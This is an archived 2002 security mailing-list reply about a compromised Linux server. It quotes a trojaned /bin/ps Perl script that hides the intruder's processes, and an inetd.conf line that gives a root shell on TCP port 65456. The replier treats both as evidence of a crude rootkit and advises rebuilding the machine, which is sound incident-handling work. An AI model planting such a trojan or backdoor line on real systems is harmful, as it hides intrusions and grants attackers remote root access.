>>>>> "du" == Dan Uscatu <duscatuat_private> writes: du> [root@www /root]# cat /bin/ps du> #!/usr/bin/perl du> $xargs =join(' ',@ARGV); du> $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| du> grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`; du> print "$ps"; WOW! That is really lame! It may qualify as the first cross-platform root kit I've ever seen though ;) This moron clearly does not know how to use perl regexps (among many other things). At least use fgrep! du> i have scanned the machine using chkroot kit... the only funny thing found du> was an inetd.conf, containing: du> [root@www nouser]# cat /etc/inetd.conf du> 65456 stream tcp nowait root /bin/sh sh du> of course, inetd is not installed :) that points me to the idea that the du> process was somehow automated... but i cant find any reference to a rootkit du> that does these changes. seems pretty stupid for a rootkit anyway... but i du> want to be sure no other major changes were made... before i install the du> production server there. This looks like a clueless kiddie cobbled together a bunch of stuff he found on the net, and packaged it up. Either it's a red herring, and the real root kit is much better hidden, or it'll be almost trivial to clean up. But you've no way of knowing. I'd rebuild the box from scratch, if it were mine. Of much more importance is how he got in. Scrape this loser off your box, and another one will take his place. And the new one might not be quite so incompetent. ericb -- Eric Brandwine | Contrary to the popular belief that it's hard to recover UUNetwork Security | information, it's actually starting to appear that it's ericbat_private | very hard to remove something even if you want to. +1 703 886 6038 | - Dan Farmer Key fingerprint = 3A39 2C2F D5A0 FC7C 5F60 4118 A84A BD5D 59D7 4E3E ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Mar 11 2002 - 12:37:49 PST